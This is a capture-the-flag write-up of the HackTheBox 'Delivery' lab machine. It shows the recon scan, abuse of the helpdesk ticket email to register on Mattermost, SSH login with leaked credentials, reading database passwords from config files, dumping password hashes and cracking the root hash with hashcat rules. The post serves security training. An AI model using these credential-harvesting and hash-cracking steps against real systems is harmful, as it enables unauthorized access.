HackTheBox - Delivery write up
5 min read

HackTheBox - Delivery write up

HackTheBox - Delivery write up

Delivery is a easy Linux box.

Recon

As always, let's start with an nmap scan :

$ nmap -A -p- -oN scan.nmap 10.10.10.222
...
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 9c:40:fa:85:9b:01:ac:ac:0e:bc:0c:19:51:8a:ee:27 (RSA)
|   256 5a:0c:c0:3b:9b:76:55:2e:6e:c4:f4:b9:5d:76:17:09 (ECDSA)
|_  256 b7:9d:f7:48:9d:a2:f2:76:30:fd:42:d3:35:3a:80:8c (ED25519)
80/tcp   open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Welcome
8065/tcp open  unknown
| fingerprint-strings: 
|   GenericLines, Help, RTSPRequest, SSLSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Accept-Ranges: bytes
|     Cache-Control: no-cache, max-age=31556926, public
|     Content-Length: 3108
|     Content-Security-Policy: frame-ancestors 'self'; script-src 'self' cdn.rudderlabs.com
|     Content-Type: text/html; charset=utf-8
|     Last-Modified: Sat, 09 Jan 2021 19:09:12 GMT
|     X-Frame-Options: SAMEORIGIN
|     X-Request-Id: 3uzeey8xwp8z8gdjw68z7cfk4y
|     X-Version-Id: 5.30.0.5.30.1.57fb31b889bf81d99d8af8176d4bbaaa.false
|     Date: Sat, 09 Jan 2021 20:53:40 GMT
|     <!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><meta name="robots" content="noindex, nofollow"><meta name="referrer" content="no-referrer"><title>Mattermost</title><meta name="mobile-web-app-capable" content="yes"><meta name="application-name" content="Mattermost"><meta name="format-detection" content="telephone=no"><link re
|   HTTPOptions: 
|     HTTP/1.0 405 Method Not Allowed
|     Date: Sat, 09 Jan 2021 20:53:40 GMT
|_    Content-Length: 0

Three ports are open, 22 for SSH, 80 for a Nginx web server and 8065 for Mattermost. Mattermost is an open-source, self-hostable online chat service.
First of all, let's check the port 80.

Web

http://10.10.10.222/index.html
http://10.10.10.222/#contact-us

Our goal is to create an account on the MatterMost, but to create an account we need a valid email address. This machine doesn't send email outside of the box, so we can't use a gmail address for example.

The HelpDesk app is on the port 80 with a different VHOST.

$ cat /etc/hosts
...
10.10.10.222 helpdesk.delivery.htb delivery.htb
http://helpdesk.delivery.htb/index.php

osTicket is a open source support ticket system.

First, I try to find some CVE on osTicket but the version was not displayed on the website. So, I look at the Javascript and CSS source code and compare it to the source code available on the github of osTicket.

https://github.com/osTicket/osTicket

The last change I see was about an update from 2 months ago, version 1.15.1. This version does not appear to be vulnerable. :(

So, I create an account on the HelpDesk.

We can see that osTicket create an email for this ticket, 9244799@delivery.htb. Let's create an account on MatterMost with this email address.

We can see the confirmation email if we check the Ticket Thread.

Once logged on the MatterMost, we can see a staff conversation.

We have the server credentials, maildeliverer:Youve_G0t_Mail! and we know that the staff uses variations of the password, PleaseSubscribe!

With the maildeliverer crendentials we can become admin of osTicket but it's not interesting. However, this credentials give us a ssh access to the box.

$ ssh maildeliverer@10.10.10.222
maildeliverer@10.10.10.222's password: Youve_G0t_Mail!
Linux Delivery 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64
...
Last login: Tue Jan  5 06:09:50 2021 from 10.10.14.5
maildeliverer@Delivery:~$ id
uid=1000(maildeliverer) gid=1000(maildeliverer) groups=1000(maildeliverer)
maildeliverer@Delivery:~$ ls
user.txt
maildeliverer@Delivery:~$ cat user.txt 
6a1c6cca2f2670e1b56ca4...

Finally, we have our first shell and the user flag !

Root

I found mysql credentials for osTicket in a PHP config file.

maildeliverer@Delivery:/var/www/osticket/upload/include$ cat ost-config.php 
...                                         
define('ADMIN_EMAIL','maildeliverer@delivery.htb');
define('DBTYPE','mysql');
define('DBHOST','localhost');
define('DBNAME','osticket');
define('DBUSER','ost_user');
define('DBPASS','!H3lpD3sk123!');
...
maildeliverer@Delivery:/var/www/osticket/upload/include$ mysql -u ost_user -p
Enter password: !H3lpD3sk123!
Welcome to the MariaDB monitor.
...
MariaDB [(none)]> use osticket;
MariaDB [osticket]> SELECT username,passwd,isadmin FROM ost_staff;
+---------------+--------------------------------------------------------------+---------+
| username      | passwd                                                       | isadmin |
+---------------+--------------------------------------------------------------+---------+
| maildeliverer | $2a$08$VlccTgoFaxEaGJnZtWwJBOf2EqMW5L1ZLA72QoQN/TrrOJt9mFGcy |       1 |
+---------------+--------------------------------------------------------------+---------+
1 row in set (0.000 sec)

This credentials are maildeliverer:Youve_G0t_Mail!, so nothing interesting here.

Afterwards, I found another mysql credentials for MatterMost in a config.json file.

maildeliverer@Delivery:/opt/mattermost/config$ cat config.json 
...
    "SqlSettings": {
        "DriverName": "mysql",
        "DataSource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s",
        "DataSourceReplicas": [],
        "DataSourceSearchReplicas": [],
        "MaxIdleConns": 20,
        "ConnMaxLifetimeMilliseconds": 3600000,
        "MaxOpenConns": 300,
        "Trace": false,
        "AtRestEncryptKey": "n5uax3d4f919obtsp1pw1k5xetq1enez",
        "QueryTimeout": 30,
        "DisableDatabaseSearch": false
    },                                
...  
mmuser:Crack_The_MM_Admin_PW
maildeliverer@Delivery:/opt/mattermost/config$ mysql -u mmuser -p
Enter password: Crack_The_MM_Admin_PW
Welcome to the MariaDB monitor.
...
MariaDB [(none)]> use mattermost;
Database changed
MariaDB [mattermost]> select username,password from Users;
+----------------------------------+--------------------------------------------------------------+
| username                         | password                                                     |
+----------------------------------+--------------------------------------------------------------+
| ...                              |                                                              |
| root                             | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO |
| ...                              |                                                              |
+----------------------------------+--------------------------------------------------------------+
9 rows in set (0.001 sec)

I assume that this hash is a variant of PleaseSubscribe!, let's use hashcat to crack it. I don't have this tool on my machine, so I install it on Google Collab, you can find the tutorial here.

$ echo '$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO' > root.hash
$ echo 'PleaseSubscribe!' > wordlists/pleasesub.dict

"""
$ hashcat -h
  Attack-          | Hash- |
  Mode             | Type  | Example command
 ==================+=======+==================================================================
  Wordlist + Rules | MD5   | hashcat -a 0 -m 0 example0.hash example.dict -r rules/best64.rule

$ hashcat -h | grep bcrypt
  3200 | bcrypt $2*$, Blowfish (Unix)                     | Operating System
"""

$ hashcat -a 0 -m 3200 root.hash wordlists/pleasesub.dict -r hashcat/rules/best64.rule
...
$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO:PleaseSubscribe!21
...

We get the password, PleaseSubscribe!21 !

maildeliverer@Delivery:~$ su root
Password: PleaseSubscribe!21
root@Delivery:/home/maildeliverer# cd
root@Delivery:~# id
uid=0(root) gid=0(root) groups=0(root)
root@Delivery:~# cat root.txt 
53b1fcb07e11b4bde325f...

I hope you enjoyed this write up !

Enjoying these posts? Subscribe for more